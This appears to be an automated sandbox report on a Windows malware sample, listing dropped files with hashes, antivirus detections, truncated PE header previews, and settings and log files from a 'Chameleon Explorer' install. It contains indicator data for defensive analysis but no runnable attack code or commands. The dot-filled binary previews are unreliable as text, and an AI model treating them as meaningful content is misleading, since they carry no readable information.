                                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.................................x[....@......@..............................@8...0.................. .................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6144
                                                                                                          Entropy (8bit):4.720366600008286
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PC bitmap, Windows 3.x format, 550 x 400 x 8, resolution 3780 x 3780 px/m, 256 important colors, cbSize 221878, bits offset 1078
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221878
                                                                                                          Entropy (8bit):2.943873456317086
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:kAm32YDp95sTuEA8dXMhQp/NeHL/msCc1J1yDusX7W4GqOQlDq3mh9h7EER0V6FP:QzcZbRj
                                                                                                          MD5:5C462496481201B9E9D855A30CEBC0CF
                                                                                                          SHA1:A0105BF0140DAC14C9ACDB07CB0740D3FD611724
                                                                                                          SHA-256:D67EC0D4146B0C030703BDC405ACD2B6EB7E7A302D65B3F339D9D45AFC05AC52
                                                                                                          SHA-512:08D4CD904D88FC97E1DFB6AAA83D4CCDF8CF4776D7D16FDE5B067ED81C65E89CA03EA0937532E0AD2E37F19C283C488E9C5EDB05366389F0848F11D1856D42C1
                                                                                                          Malicious:false
                                                                                                          Preview:BM.b......6...(...&.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\update.exe
                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16384
                                                                                                          Entropy (8bit):2.112845443424556
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:JK6QcaV58B1tavw9vkzPZ40wzFxsz8lJdSvQV9:JK6QT83orPzwpx1ivQT
                                                                                                          MD5:11CCDB0E7F10333821E7F7CEEC678F4F
                                                                                                          SHA1:62F6229910C3DB65B9859D87EE47A2B243EDE916
                                                                                                          SHA-256:0EDEB54E5E86A870EB919252208BB1C1FB7EF31210BCF5B1F44A2414048492DB
                                                                                                          SHA-512:85AD8E75CF820DF011FC132BE2B5DD54E47407A5FF8F544FD93013371723E873C0696C3ABA36A5E79F6DFAD628C5F353D8E90076906C700BD545418CA2125C6B
                                                                                                          Malicious:false
                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\ETVk1yP43q.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6860752
                                                                                                          Entropy (8bit):7.995791234867719
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:196608:ZIwvgsb87DwQiiFFL4an2L/dfXaI+fVcZg:33Stl4LL/ZaIg
                                                                                                          MD5:B2E5A8FE3CA4F0CD681B5662F972EA5F
                                                                                                          SHA1:B7DBCFAEE55ECBF0158431D85DABDD479AB449C7
                                                                                                          SHA-256:E71C48C03B8CFD37BF17E62460733A4BFE9C484E947FD9DB291F65405A2BA9E8
                                                                                                          SHA-512:40B7140F5C182CD51CEE142A2575BD70DC9BDE311AD3952119FB9769B5CEEB467695AA5A66FC90520712D9A39458930EFB965496D6443665B7597CFD66247AAF
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W..................................... ....@...................................i...@......@....................................................h. ............................................................................................text...D........................... ..`.itext..d........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.................&...................rdata...............&..............@..@.rsrc................(..............@..@....................................@..@........................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\ETVk1yP43q.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):700768
                                                                                                          Entropy (8bit):6.940236637698784
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:vt34nYwU1qWSxe5S6x/5dm88RzDgYZ7NVB2fEUKV:vt3U0Uxe06x/54tz0cHB28B
                                                                                                          MD5:912B031EAEE45A05000F7DE4E9B734BC
                                                                                                          SHA1:B75F0A7E78F591275E1E5490F791AFB701E3BE8C
                                                                                                          SHA-256:B267669009A20C53322AB5EE32BD198B7751935E058C5C0B1A079263B4FF3F16
                                                                                                          SHA-512:5B1D75A563C03115AD006E530B0E784E7EDC1DDAA711D62FA481CCE65CFDBD713D30FA79C12D8D013D6334A12B0D8BD7A9DE2860AEB92EB4C5FFCDE0EA48A918
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L...`s.R..........................................@..................................y......................................t...(.......H...............`...................................................8... .......0............................text............................... ..`.data...............................@....rsrc...H...........................@..@..V............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):736
                                                                                                          Entropy (8bit):5.19291613287325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:71WWe2T/GYxe4EfiYP/LpT7TAiE6AufSEnh9mgyzYhG:71//psEkSgrG
                                                                                                          MD5:8DD2C4351E4B0D2930D563DA2C6C2A48
                                                                                                          SHA1:A1B468692AC3F74F9A2550AEAAFF0D9624513C71
                                                                                                          SHA-256:EFCA88B595BB73EFCEBA76EC7563B29AC32C4B5A86217C4BF1FBB68B1FFC0F5C
                                                                                                          SHA-512:F9C409B25AA07AD3B4421A841AD9F1139CC2B134F47EF8844D948367B5D30107F7BB5FDB1EC3B15D1CB5460631405784B57046CF8174BF8D05A6ED62847A0C08
                                                                                                          Malicious:false
                                                                                                          Preview:.[0]..Masks=.txt;.doc;.docx;.xls;.xlsx;.pdf;.rtf;.odt;.ods;.chm;.ini;.mobi;.epub;.azw;.djvu;.fb2..Enabled=0..ColorText=5283896..ColorBack=-1....[1]..Masks=.png;.jpg;.jpeg;.gif;.bmp;.tif;.tiff;.psd;.ico..Enabled=0..ColorText=5718738..ColorBack=-1....[2]..Masks=.avi;.mpg;.wmv;.mkv;.mpeg;.flv;.mp4;.vob;.mov;.divx..Enabled=0..ColorText=26316..ColorBack=-1....[3]..Masks=.mp3;.wav;.flac;.ape;.ogg..Enabled=0..ColorText=33023..ColorBack=-1....[4]..Masks=.exe;.bat;.msi;.application;.cmd..Enabled=1..ColorText=6830483..ColorBack=-1....[5]..Masks=.dll;.ocx..Enabled=0..ColorText=15728760..ColorBack=-1....[6]..Masks=.zip;.rar;.7z;.cab;.gz;.tar..Enabled=1..ColorText=13797186..ColorBack=-1....[IntegrityCheckingSignature]..Finish=Success....
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):736
                                                                                                          Entropy (8bit):5.19291613287325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:71WWe2T/GYxe4EfiYP/LpT7TAiE6AufSEnh9mgyzYhG:71//psEkSgrG
                                                                                                          MD5:8DD2C4351E4B0D2930D563DA2C6C2A48
                                                                                                          SHA1:A1B468692AC3F74F9A2550AEAAFF0D9624513C71
                                                                                                          SHA-256:EFCA88B595BB73EFCEBA76EC7563B29AC32C4B5A86217C4BF1FBB68B1FFC0F5C
                                                                                                          SHA-512:F9C409B25AA07AD3B4421A841AD9F1139CC2B134F47EF8844D948367B5D30107F7BB5FDB1EC3B15D1CB5460631405784B57046CF8174BF8D05A6ED62847A0C08
                                                                                                          Malicious:false
                                                                                                          Preview:.[0]..Masks=.txt;.doc;.docx;.xls;.xlsx;.pdf;.rtf;.odt;.ods;.chm;.ini;.mobi;.epub;.azw;.djvu;.fb2..Enabled=0..ColorText=5283896..ColorBack=-1....[1]..Masks=.png;.jpg;.jpeg;.gif;.bmp;.tif;.tiff;.psd;.ico..Enabled=0..ColorText=5718738..ColorBack=-1....[2]..Masks=.avi;.mpg;.wmv;.mkv;.mpeg;.flv;.mp4;.vob;.mov;.divx..Enabled=0..ColorText=26316..ColorBack=-1....[3]..Masks=.mp3;.wav;.flac;.ape;.ogg..Enabled=0..ColorText=33023..ColorBack=-1....[4]..Masks=.exe;.bat;.msi;.application;.cmd..Enabled=1..ColorText=6830483..ColorBack=-1....[5]..Masks=.dll;.ocx..Enabled=0..ColorText=15728760..ColorBack=-1....[6]..Masks=.zip;.rar;.7z;.cab;.gz;.tar..Enabled=1..ColorText=13797186..ColorBack=-1....[IntegrityCheckingSignature]..Finish=Success....
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):793
                                                                                                          Entropy (8bit):5.017107027448105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:4aoIJ8i3quu5IJ0x9KIuuPI5VuujpI6Tp0iuuHG:4aoIK6q1IJ0OITI7vpIqjG
                                                                                                          MD5:D0E6E59B4C0A90FF05AEAEA3B850E780
                                                                                                          SHA1:1E975637110EF7EEE57C739E5B208D624F2D44C4
                                                                                                          SHA-256:99428152166486929659D14D11FB12822E2DC5EFF9FA43706C35407A45FCA898
                                                                                                          SHA-512:62522B9BA3557BDE691945EEED75C05C53146D05E9632D6EF5BFAE083FCF52F885277398E4E9853432C2E1366ACBC5FA8E73BA08584AD36C52C70F00869CC0CD
                                                                                                          Malicious:false
                                                                                                          Preview:.[Settings]..MaxFilterIndex=4....[3]..Name=Images..IncludeFilter=*.jpg;*.jpeg;*.png;*.tiff;*.gif;*.bmp;*.webp;*.psd;*.svg;*.psp;*.tga;*.ai;*.cdr..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[4]..Name=Documents..IncludeFilter=*.doc;*.docx;*.txt;*.rtf;*.xls;*xlsx;*.odt;*.ods;*.pdf;*.djvu;*.mobi;*.epub;*.fb2;*.ppt;*.pptx..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[2]..Name=Audio..IncludeFilter=*.mp3;*.wav;*.flac;*.ape;*.3gp;*.amr;*.m4a;*.m4p;*.ogg;*.oga;*.ra;*.rm;*.wv;*.wma..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[1]..Name=Video..IncludeFilter=*.avi;*.mkv;*.mp4;*.mov;*.wmv;*.flv;*.divx;*.ts;*.mpeg;*.vob;*.3gp;*.webm;*.flv;*.mpg;*.mp4..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[IntegrityCheckingSignature]..Finish=Success....
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):793
                                                                                                          Entropy (8bit):5.017107027448105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:4aoIJ8i3quu5IJ0x9KIuuPI5VuujpI6Tp0iuuHG:4aoIK6q1IJ0OITI7vpIqjG
                                                                                                          MD5:D0E6E59B4C0A90FF05AEAEA3B850E780
                                                                                                          SHA1:1E975637110EF7EEE57C739E5B208D624F2D44C4
                                                                                                          SHA-256:99428152166486929659D14D11FB12822E2DC5EFF9FA43706C35407A45FCA898
                                                                                                          SHA-512:62522B9BA3557BDE691945EEED75C05C53146D05E9632D6EF5BFAE083FCF52F885277398E4E9853432C2E1366ACBC5FA8E73BA08584AD36C52C70F00869CC0CD
                                                                                                          Malicious:false
                                                                                                          Preview:.[Settings]..MaxFilterIndex=4....[3]..Name=Images..IncludeFilter=*.jpg;*.jpeg;*.png;*.tiff;*.gif;*.bmp;*.webp;*.psd;*.svg;*.psp;*.tga;*.ai;*.cdr..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[4]..Name=Documents..IncludeFilter=*.doc;*.docx;*.txt;*.rtf;*.xls;*xlsx;*.odt;*.ods;*.pdf;*.djvu;*.mobi;*.epub;*.fb2;*.ppt;*.pptx..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[2]..Name=Audio..IncludeFilter=*.mp3;*.wav;*.flac;*.ape;*.3gp;*.amr;*.m4a;*.m4p;*.ogg;*.oga;*.ra;*.rm;*.wv;*.wma..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[1]..Name=Video..IncludeFilter=*.avi;*.mkv;*.mp4;*.mov;*.wmv;*.flv;*.divx;*.ts;*.mpeg;*.vob;*.3gp;*.webm;*.flv;*.mpg;*.mp4..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[IntegrityCheckingSignature]..Finish=Success....
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1053
                                                                                                          Entropy (8bit):5.1426172167326865
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:fQlPKE3CpE3zN5E38/E3F9E3nmJxE3vxE36TpE3laNE3RE3bE3ZjxE3Fg9lKE34G:cS/s5PqkQiz+aNo2ABMjG
                                                                                                          MD5:0D257FC18C0C4280C3E1B5DA5FD3CFEC
                                                                                                          SHA1:89B0C1926EA6B2CC1AFBA1C735E9EB8CC67AEC10
                                                                                                          SHA-256:3B422B43A76E79ED83D5AD439A19A24A8B0C29984660093F8FB4CBEAAAB6022D
                                                                                                          SHA-512:019674DAF1CB9DBAAE8EB01E73F43E9DD69368CA783782AD47368E13CC77B4ACF7A7C5F382869D5BBC3118462F6383694A7184C1FECC88BD9158D7B5E29E22A5
                                                                                                          Malicious:false
                                                                                                          Preview:.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:) CCCOMA_X64FRE_EN-GB_DV9..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1053
                                                                                                          Entropy (8bit):5.1426172167326865
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:fQlPKE3CpE3zN5E38/E3F9E3nmJxE3vxE36TpE3laNE3RE3bE3ZjxE3Fg9lKE34G:cS/s5PqkQiz+aNo2ABMjG
                                                                                                          MD5:0D257FC18C0C4280C3E1B5DA5FD3CFEC
                                                                                                          SHA1:89B0C1926EA6B2CC1AFBA1C735E9EB8CC67AEC10
                                                                                                          SHA-256:3B422B43A76E79ED83D5AD439A19A24A8B0C29984660093F8FB4CBEAAAB6022D
                                                                                                          SHA-512:019674DAF1CB9DBAAE8EB01E73F43E9DD69368CA783782AD47368E13CC77B4ACF7A7C5F382869D5BBC3118462F6383694A7184C1FECC88BD9158D7B5E29E22A5
                                                                                                          Malicious:false
                                                                                                          Preview:.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:) CCCOMA_X64FRE_EN-GB_DV9..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1053
                                                                                                          Entropy (8bit):5.1426172167326865
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:fQlPKE3CpE3zN5E38/E3F9E3nmJxE3vxE36TpE3laNE3RE3bE3ZjxE3Fg9lKE34G:cS/s5PqkQiz+aNo2ABMjG
                                                                                                          MD5:0D257FC18C0C4280C3E1B5DA5FD3CFEC
                                                                                                          SHA1:89B0C1926EA6B2CC1AFBA1C735E9EB8CC67AEC10
                                                                                                          SHA-256:3B422B43A76E79ED83D5AD439A19A24A8B0C29984660093F8FB4CBEAAAB6022D
                                                                                                          SHA-512:019674DAF1CB9DBAAE8EB01E73F43E9DD69368CA783782AD47368E13CC77B4ACF7A7C5F382869D5BBC3118462F6383694A7184C1FECC88BD9158D7B5E29E22A5
                                                                                                          Malicious:false
                                                                                                          Preview:.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:) CCCOMA_X64FRE_EN-GB_DV9..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):276
                                                                                                          Entropy (8bit):3.4156350137555784
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:Q2M0lulC+Sk2lAmEoclc2omlulC+Sk2lAmEoclc2EErMJ2wlw:Q2MVrqjEocTorqjEocTvQJbw
                                                                                                          MD5:1DF88E86BA431EBE44D9BAD2791F5373
                                                                                                          SHA1:B02A80676136ED8A69308EBA7019D5A6C5BFAB10
                                                                                                          SHA-256:95EB9CC8C1164C1B000F2B565589AFB7E3795610C423E307682FDE66738C4D84
                                                                                                          SHA-512:A887C130380D1B0895C7C7305256999010EE9500E12689EEC707800DA6F0BA5F4691B82D35138697FC4AFA7B85481F806AA00C3E0913666E1A482C70D8C7E683
                                                                                                          Malicious:false
                                                                                                          Preview:..2.0.:.2.7.:.4.5. .:. .I.m.p.o.r.t.W.i.n.d.o.w.s.S.e.t.t.i.n.g.s. .P.A.R.A.M.S.:. .b.e.g.i.n.....2.0.:.2.7.:.2.7. .:. .I.m.p.o.r.t.W.i.n.d.o.w.s.S.e.t.t.i.n.g.s. .P.A.R.A.M.S.:. .b.e.g.i.n.....2.0.:.2.7.:.2.9. .:. .F.o.l.d.e.r.I.n.i.t. .P.A.R.A.M.S.:. .S.e.t.H.o.o.k.........
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):7576
                                                                                                          Entropy (8bit):3.627889446193429
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:t8NerYhTj7Xw4FJBjfNyxH+KzSsa0MQ8L327dfSqxtyQGYAHdvXaEyKXdPHBLpRu:t8NQYhTvw4FJBjfNyxH+KzSsa0MQ8L36
                                                                                                          MD5:44D9519EF26E2DB02DF67B321A0756CF
                                                                                                          SHA1:B80DF17C79E9801E4AE30FBD4C2F51FFAB948D78
                                                                                                          SHA-256:DC3DA88B6429769202614D24E6904C3BBEB4F5EF36C90C619F5341437B8B97F4
                                                                                                          SHA-512:5F2AC51C2C8073CC2E8C4C73FC141426B2E6C6C4EBD1348CDCC3FEB7152B1914EEF6C6207381225C91119A1A7B2F3ECA3C2C1976776B4A7C40737DD34B1D5A4F
                                                                                                          Malicious:false
                                                                                                          Preview:..2.0.:.2.7.:.1.6. .:. .D.e.l.e.t.e.F.r.o.m.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .D.e.l.e.t.e.T.a.s.k. .f.a.i.l. .C.h.a.m.e.l.e.o.n. .F.o.l.d.e.r.-.j.o.n.e.s.....2.0.:.2.7.:.1.6. .:. .L.a.u.n.c.h.T.h.r.o.u.g.h.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .S.t.a.r.t.....2.0.:.2.7.:.1.6. .:. .L.a.u.n.c.h.T.h.r.o.u.g.h.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .I.s.N.e.w.=.C.h.a.m.e.l.e.o.n. .F.o.l.d.e.r.-.j.o.n.e.s.....2.0.:.2.7.:.1.9. .:. .T.r.y.S.c.h.e.d.u.l.e.r.S.t.a.r.t. .P.A.R.A.M.S.:. .A.l.r.e.a.d.y. .e.v.a.l.u.a.t.e.d.....2.0.:.2.7.:.2.0. .E.R.R.O.R. .(.).:. .C.h.e.c.k.F.i.l.e. .M.E.S.S.:. .C.o.p.y.F.i.l.e. .n.e.w. .f.a.i.l. .P.A.R.A.M.S.:. .E.x.p.l.o.r.e.r.H.e.l.p.e.r.3.2...d.l.l. .L.A.S.T._.E.R.R. .(.3.2.,. .0.0.0.0.0.0.2.0.).:. .T.h.e. .p.r.o.c.e.s.s. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e. .b.e.c.a.u.s.e. .i.t. .i.s. .b.e.i.n.g. .u.s.e.d. .b.y. .a.n.o.t.h.e.r. .p.r.o.c.e.s.s.........2.0.:.2.7.:.3.0. .:. .L.a.u.n.c.h.T.h.r.o.u.g.h.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .S.t.a.r.t. .w.i.t.h. .R.
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2868
                                                                                                          Entropy (8bit):3.667732015407199
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:GDpDPBCw7XbSHthW79j+zXqTNXq05yc2PB8NVsgraUVZTGX1Bh6hpDPBCw7Xt:GDdpCw7XbcrIgC5yc2J8Nugra8ZTGX16
                                                                                                          MD5:F1DB8B14B5D14857C55B7E3906C1B01A
                                                                                                          SHA1:272EDC3F809DE85F0B0619BA6ADD2B503EC2E778
                                                                                                          SHA-256:73578FF24B711F7A20EBC00A8170A4FE1D3BAE95871C5EAC7EA96EAE65937409
                                                                                                          SHA-512:F4AAB720C999EB32DA53C1F1032449CAA8A5718CF533062FD2A48705C5C6BAF5F791A8DC6C82BFF897B2010335EF140E0B177330EA77F9E7FBD3BCDE09189A45
                                                                                                          Malicious:false
                                                                                                          Preview:..0.1./.0.1./.2.0.2.5. .2.0.:.2.7.:.2.0.:. .E.R.R.O.R. .(.).:. .C.h.e.c.k.F.i.l.e. .M.E.S.S.:. .C.o.p.y.F.i.l.e. .n.e.w. .f.a.i.l. .P.A.R.A.M.S.:. .E.x.p.l.o.r.e.r.H.e.l.p.e.r.3.2...d.l.l. .L.A.S.T._.E.R.R. .(.3.2.,. .0.0.0.0.0.0.2.0.).:. .T.h.e. .p.r.o.c.e.s.s. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e. .b.e.c.a.u.s.e. .i.t. .i.s. .b.e.i.n.g. .u.s.e.d. .b.y. .a.n.o.t.h.e.r. .p.r.o.c.e.s.s.....L.a.s.t. .s.y.s.t.e.m. .e.r.r.o.r.:. .C.l.a.s.s. .d.o.e.s. .n.o.t. .e.x.i.s.t. .(.1.4.1.1.).....C.o.m.p.i.l.e.T.i.m.e.:. .2.4.-.1.2.-.2.0.1.6. .1.4.-.1.7.....T.e.r.m.i.n.a.t.e.d.:. .F.a.l.s.e.....I.s.P.r.o.g.r.a.m.T.e.r.m.i.n.a.t.e.d.:. .F.a.l.s.e.....P.r.o.d.u.c.t.:. .W.i.n.d.o.w.s. .1.0. .P.r.o.....S.e.r.v.i.c.e. .P.a.c.k.:. .....B.u.i.l.d.:. .0.....V.e.r.s.i.o.n.:. .6.4.-.b.i.t.....U.A.C.:. .e.n.a.b.l.e.d.....U.A.C.:. .e.l.e.v.a.t.e.d.....C.P.U.:. .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z.....N.o.r.m.F.r.e.q.:. .2.0.0.0.....R.a.w.F.r.e.q.:. .2.0.0.0.....T.
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):7.959667397423965
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:ETVk1yP43q.exe
                                                                                                          File size:8'302'080 bytes
                                                                                                          MD5:56ecf4355112dcd2f73e04d0d1784178
                                                                                                          SHA1:6ba04b9f47530333b9dda9ed424cdbf418896081
                                                                                                          SHA256:0b2cb44ca93dc45f099ad395ff46b2e9475e539ac8aa5a362e07f5f9f72425f6
                                                                                                          SHA512:b992ae5d1a23d22805f7e2325e1168d99c1be55c23c38b24b3496b12fa25483b398d4fee3b8b3a786928f8dfbd5c3b0ed462d38fa3689d51f0c0190a515cdfdc
                                                                                                          SSDEEP:196608:hCK1JhIdB4LC4BgRexpA4O1Xq7pZIBVIAg26FsluEMC/WpsvkCesIGz:g+Jo4m4iwg/qfDLKEC/WSvkCeHw
